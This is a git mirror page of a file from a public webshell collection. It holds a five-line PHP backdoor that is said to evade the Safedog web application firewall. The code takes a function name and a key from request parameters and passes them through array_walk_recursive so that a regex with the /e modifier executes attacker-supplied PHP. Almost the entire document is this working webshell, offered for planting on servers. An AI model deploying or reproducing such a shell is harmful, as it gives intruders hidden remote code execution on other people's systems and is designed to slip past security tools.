mirror of
https://github.com/tennc/webshell
synced 2024-11-22 03:03:03 +00:00
cd1e25025a
from : https://www.sqlsec.com/2020/07/shell.html killed by safedog
5 lines
120 B
PHP
5 lines
120 B
PHP
<?php
|
|
$e = $_REQUEST['e'];
|
|
$arr = array($_POST['pass'] => '|.*|e',);
|
|
array_walk_recursive($arr, $e, '');
|
|
?>
|